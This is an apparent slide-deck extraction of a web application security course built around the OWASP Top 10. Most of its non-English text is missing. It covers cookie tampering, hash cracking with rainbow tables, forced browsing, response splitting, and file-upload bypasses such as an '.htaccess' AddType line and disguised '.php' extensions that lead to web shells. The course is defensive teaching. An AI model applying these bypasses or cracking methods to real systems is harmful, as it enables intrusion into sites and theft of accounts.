(   test2)




              167
– http://www.test.com.tw/UserDataManagement/Use
  rDataEdit.aspx?access=read
– https://web_ip/index.php?id=john&is_admin=fales
  &menu=basic
    !




                                               168
                    (cont.)
 cookie
           Cookie
– uid :
– username :
– admin : 0/1/Y/N
– permission :    /
      ! (Cookie Poisoning/Spoofing)



       !

                                      169
:   ?!




         170
      (cont.)
!!!




                171
      (cont.)
!!!




                172
Authentication


                         (       )
                             /

   – SSL


   – Hash / Encryption


                                     173
    (cont.)

–
– Re-authentication
–
– SSL
–            ( :by email)


–             : “             ??”
– Send a unique time-limited unguessable single-use
  recovery URL to user’s email provided during
  registration.
                                                  174
      (cont.)
Session Management
      Session Token
  –           cookie
          cookie scope (domain & path)
      Cookie       secure flag


  –                              cookie
          URL
                   Referer header / Browsing History
          :                             (         replay)



                                                            175
     (cont.)
Logout( ) !
 –                       session

 –   session token



Limit session lifetime
No concurrent logins !
                                   !


                                   176
    OWASP Top10(2007)-8
Insecure Cryptographic Storage
OWASP Top 10 (2007) - 8
   Insecure Cryptographic Storage

       Log /




                                    178
179
    “             ”           Password
   Password : 12345678
Algorithm             Value
Base64                MTIzNDU2Nzg=
DES (13 chars)        aaNN3X.PL2piw
MD5 (32 chars)        25d55ad283aa400af464c76d713c07ad

SHA1 (40 chars)       7c222fb2927d828af22f592134e8932480637c0d
Salted MD5            $1$tsLFcOYh$5ibC1Ui2OPwUvyGUttUFI1
LanMan                0182BD0BD4444BF836077A718CCDF409
NTLM                  259745CB123A52AA2E693AAACCA2DB52




                                                                 180
Hashed Password Cracking Process
                                                      Possible candidates

 Hashed Password             Plaintext 000001’ hash      Plaintext 000001

                             Plaintext 000002’ hash      Plaintext 000002
  7c222fb2927d8
  28af22f592134e   Match ?
  8932480637c0d                      ….                       ….
                             Plaintext 999999’ hash      Plaintext 999999

                             !

        Rainbow Table
                  table-lookup

                                                                            181
Rainbow Table Generator
   Winrtgen




                          182
Free Rainbow Tables




                      183
Password Crackers
   John the Ripper
     http://www.openwall.com/john/
     DES/MD5/Salted MD5/LM
   John The Ripper MPI Patch
     http://bindshell.net/tools/johntheripper
     DES/MD5/Salted MD5/LM/NTLM/…
   Cain & Abel
     http://www.oxid.it/
     LM/NTLM/MD5/SHA1/…
   RainbowCrack
     http://www.antsight.com/zsl/rainbowcrack/
     MD5/SHA1/LM/NTLM/…
   Google
     Reverse MD5
     Reverse SHA1
                                                 184
….




     185
Principles

                                Hash
   –                                  &               key size
   – Hash
                : LM MD5 SHA1
              : MD5 twice, SHA-256
                    hash                            (salt)
              : $1$tsLFcOYh$5ibC1Ui2OPwUvyGUttUFI1
   – Cipher
                : DES Triple DES
              : AES(AES-128, AES-192 and AES-256)
                                                                 186
     (cont.)
For encryption keys
 –
For configuration store
 –
     .NET : Aspnet_setreg.exe
     (http://support.microsoft.com/default.aspx?scid=329290)
 –




                                                               187
 OWASP Top10(2007)-9
Insecure Communication
OWASP Top 10 (2007) - 9
   Insecure Communication




                            189
For Web Connections :
         SSL                                  !
   –
         Password Session ID
   –
   –
   –
               SSL               !
For Infrastructure Elements’ Communications:
  e.g.
   – TLS (Transport Layer Security)   IPSec



                                                  190
   OWASP Top10(2007)-10
Failure to Restrict URL Access
OWASP Top 10 (2007) - 10
   Failure to Restrict URL Access


     Web Server
     AP




                                    192
?




    193
       :
/index.asp




      /


             194
Forceful Browsing
        HTML                                   URL

     adduser/deluser showprofile/editprofile     …


            : .bak .old .tmp *~
                    : .inc .cfg .log .mdb .xls .sql
            : .tar .zip .rar .tgz




                                                      195
Google Hacking




                 196
                      …


        +
–            …..
–           No SSL
–

     No/Bad authorization
    Demo     …..




                            197
!!!




      198
    :
        URL


              (@Web Server)



–              !
–             !!!!




                              199
       (cont.)

                          URL
   –                 (    )


   –                            ?   ?
   –
                     IP
Secure Default

   – Role Based
           (              )
   –           vs.
                                        200
Other Issues
HTTP Response Splitting
HTTP Response Splitting
   HTTP
      :
          AP
          HTTP         Header
          :
                                        HTTP
     Response          (        )
                                    :
      –       Script
      –
      –

                                           203
HTTP Response Splitting
       :




                    :




                          204
HTTP Response Splitting
            :



        :




                          205
–   |                            (
–   & ‘ ’                            )
–   ;                    – 0~9
–   $                    – /
–   %                    – -
–   @ at
–   ‘
–   “
–   \‘
–   \“
–   <>
–   ()
–   +
–   CR      ASCII 0x0d
–   LF      ASCII 0x0a
–   ,
–   \
                                         206
Parameter Tampering
Parameter Tampering
      URL                                    !!!
    radio button check box   select menu
    hidden value (               ?!)
                 (                 !!!)
    SQL XSS
            (      ?!)
            (      ?!)
                         (                         )

                                       !!!
                                              208
209
Input Validation
      Business Logic       !
                               Session
        !




            Session    (          )


                                         210
  AP
           ….


WebShell   Web




                 212
WebShell




           213
FCKeditor ?!




  (http://www.informationsecurity.com.tw/article/article_detail.aspx?aid=5790)   214
            :

                                   : Apache + PHP
                                     “.htaccess”,         :
     AddType application/x-httpd-php .jpg
                  PHP                       .jpg
filename.php.123 ?!
 – Apache
filename.php.jpg ?!
 – Apache                               PHP :
        AddHandler      AddType.
 –                                 ‘.php’           PHP



                                                              215
             !

– .gif.php (    )
– %2E%70%68%70 ( .php)
– .pHp




–   Web Server               MIME-Type

–                        :
–                :
                                         216
(http://www.informationsecurity.com.tw/article/article_detail.aspx?aid=5790)




                                                                               217
Attack Local Privacy
Attack Local Privacy

              “        ”

     Persistent Cookies
      –     Set-Cookie          expires       (          )

          Set-Cookie : UID=d475;expires=Wed, 10-Oct-09
          16:08:30GMT
     Cached Web Content
      – Non-SSL Response                             cache
      – IE      Registry
                                                             219
Attack Local Privacy (cont.)
      Browsing History
       – http://rad.msn.com/ADSAdClient31.dll?GetAd=&PG=IMSTWN
         &AP=1007
       –
      Auto-complete
       – IE :        Registry
       – Firefox :




                                                           220
  Set-Cookie                 expires
                       ,               replay attack
                            cache
Response Header :
 Expires: 0
 Cache-control: no-cache
 Pragma: no-cache

                       URL
POST + SSL
                           auto-complete
 : <input name="password" type="password" id="i0118"
maxlength="16" autocomplete="off" value="" />          221
Log   Audit & Notification
                     : 3A


             Authentication
               (        )




Authorization                     Audit
(            )                (           )


                                              223
Log

                        :
           (       )/




                   (        )



                                Special for
               /                              224
      ….
Log / Audit
                         Log

      –
      –


                 Log
                Log       / SOC(Security
     Operation Center)
      –
      –
                                           225
Notification


               (             )




               out-of-band
      Email/
         /


                                 226
HTTP
 Browser Extensions
 Web Proxy



                      DOS




                            228
HTTP
  Browser Extensions – IE
    TamperIE
       – http://www.bayden.com/Other/
       –
       –         Javascript
    HTTPWatch
       – http://www.httpwatch.com/
       –      IE         Request      Response
       –
    HTTP Analyzer
       – http://www.ieinspector.com/httpanalyzer/
       –       HTTPWatch
       – Standalone


                                                    229
TamperIE
HTTPWatch(Commercial)
HTTP                              (cont.)

  Browser Extensions – Firefox
    Tamper Data
       – https://addons.mozilla.org/firefox/966/
    Add N Edit Cookies
       – https://addons.mozilla.org/firefox/573/
    Live HTTP Headers
       – https://livehttpheaders.mozdev.org/
    HttpFox
       – https://addons.mozilla.org/firefox/addon/6647
    RefControl
       – https://addons.mozilla.org/firefox/addon/953
    HackBar
       – https://addons.mozilla.org/firefox/addon/3899
                                                         232
Tamper Data
Add N Edit Cookies
HttpFox
HackBar




          236
HTTP                                     (cont.)

  Web Proxy
   Burp Suite
       – http://portswigger.net/suite/
   Paros
       – http://www.parosproxy.org/
   Odysseus
       – http://www.bindshell.net/tools/odysseus
   Fiddler
       – http://www.fiddlertool.com/fiddler/
   WebScarab
       – http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project

   SPIKE Proxy
       – http://www.immunitysec.com/resources-freesoftware.shtml
   Achilles
       – http://www.mavensecurity.com/achilles
                                                                           237
Burp Suite




             238
Paros (   Free Web Scan)
                      (Commercial)
HP DevInspect
  https://h10078.www1.hp.com/cda/hpms/display/main/hpms_cont
  ent.jsp?zn=bto&cp=1-11-201-200%5E9564_4000_100__
Parasoft
  http://www.parasoft.com/jsp/home.jsp
Fortify 360 SCA(Source Code Analyzer)
  http://www.gss.com.tw/tw/IT-tools/Fortify-SCA.htm
  http://www.fortify.com/products/detect/in_development.jsp;jsessi
  onid=FE6FC1EFD16D72EF59191714521AB1E9
Klocwork
  http://www.klocwork.com/products/?_kk=code%20review%20to
  ol&_kt=f237adfe-c22e-44ff-af59-0a79f6d8abc7&gclid=CLf-
  uNXJn5wCFQkwpAodA2J_cw
IBM
  http://www-
  01.ibm.com/software/rational/products/appscan/source/
           -CodeSecure
                                                               240
  http://www.armorize.com/?link_id=codesecure
             (Commercial)

Fortify 360 SCA(Source Code Analyzer)




                                        241
     (Commercial)

-CodeSecure




                    242
                         (Commercial)

Acunetix
  http://www.acunetix.com/
HP WebInspect
  https://h10078.www1.hp.com/cda/hpms/display/main/hpms_cont
  ent.jsp?zn=bto&cp=1-11-201-200%5E9570_4000_100__
IBM Rational AppScan
  http://www-01.ibm.com/software/awdtools/appscan/




                                                          243
           (Commercial)

Acunetix




                          244
                (Commercial)

HP WebInspect
                (Commercial)

IBM Rational AppScan (     )




                               246
                       (Free)

ab (Apache Benchmark)
  http://httpd.apache.org/
JMeter
  http://jakarta.apache.org/jmeter/
Microsoft Web Application Stress Tool
  http://www.microsoft.com/technet/archive/itsolutions/
  intranet/downloads/webstres.mspx
Microsoft Application Center Test
  http://msdn2.microsoft.com/en-
  us/library/aa287410(VS.71).aspx
…. Many tools
  http://www.softwareqatest.com/qatweb1.html
                                                     247
                          (Commercial)

HP Mercury LoadRunner
  http://www.mercury.com/us/products/performance-
  center/loadrunner/
IBM Rational Performance Tester
  http://www-
  306.ibm.com/software/awdtools/tester/performance/index.html
Compuware QALoad
  http://www.compuware.com/products/qacenter/qaload.htm
Radview WebLOAD
  http://www.radview.com/product/description-overview.aspx
Borland SilkPerformer
  http://www.borland.com/us/products/silk/silkperformer/index.ht
  ml
Empirix Web Applications Testing and Monitoring
Solutions
  http://www.empirix.com/products-services/web_applications.asp
                                                                248
     :                              ?


            Confidentiality
               (      )




Integrity                     Availability
 (      )                      (       )


                                             250
               Security Risk         Secure Coding    Dynamic   Continuous
               Analysis                               Testing   Defense
                                                                & Monitoring
Security                       Security      Code
Requirements                   Design        Review




                                                                          251
USD 100   USD 5 for 95% savings in development




                                                 252
code review
RFP




      254
A chain is only as strong as its weakest link !




                                            255
Trade-
Trade-Off


                  Convenient




 Performance


                               Security

           Cost



                       Administration     256
    :   HTTP Essentials    - Stephen Thomas
   : Writing Secure Code 2nd Edition     - Michael
Howard David LeBlanc
    : The Web Application Hackers Handbook       -
Dafydd Stuttard Marcus Pinto
    : Hacking the Code (ASP.NET Web
ApplicationSecurity) - Mark M. Burnett James
C.Foster
        : http://en.wikipedia.org



                                                     257
OWASP
   Top Ten Project
   http://www.owasp.org/index.php/OWASP_Top_Ten_Project
   Guide Project
   http://www.owasp.org.tw/index.php/Category:OWASP_Guide
   _Project
   ESAPI Project
   http://www.owasp.org/index.php/Category:OWASP_Enterpris
   e_Security_API#tab=About
IBM Demo Site :
  http://www.testfire.net/
The Cross Site Scripting (XSS)
  http://xssed.com/
The Cross Site Scripting (XSS) FAQ
                                                        258
  http://www.cgisecurity.com/articles/xss-faq.shtml
DOM Based XSS
    http://www.webappsec.org/projects/articles/071105.html
 SQL Injection (              )–          SQL              :
    http://www.microsoft.com/taiwan/sql/SQL_Injection_G1.htm
    http://www.microsoft.com/taiwan/sql/SQL_Injection_G2.htm
 Java EE – use strongly typed PreparedStatement, or
 ORMs such as Hibernate or Spring
    J2EE Prepared Statements:
    http://java.sun.com/docs/books/tutorial/jdbc/basics/prepared.ht
    ml
.NET – use strongly typed parameterized queries, such
as SqlCommand with SqlParameter or an ORM like
Hibernate
    How to: Protect from SQL injection in ASP.Net
    http://msdn2.microsoft.com/en-us/library/ms998271.aspx
                                                                 259
 “How CAPTCHA got trashed”
    http://www.computerworld.com/s/article/9104619/How_CAPT
    CHA_got_trashed
 CAPTCHA Decoder
    http://caca.zoy.org/wiki/PWNtcha
“Why File Upload Forms are a major security threat”
    http://www.acunetix.com/websitesecurity/upload-forms-
    threat.htm
HTTP Response Splitting
    http://download.boulder.ibm.com/ibmdl/pub/software/dw/rich
    media/rational/08/appscan_demos/httpresponsesplitting/viewer.
    swf#recorded_advisory
 “2009 CWE/SANS Top 25 Most Dangerous
 Programming Errors”
                                                              260
    http://cwe.mitre.org/top25/index.html

				
DOCUMENT INFO
Shared By:
Categories:
Tags:
Stats:
views:26
posted:8/6/2012
language:
pages:260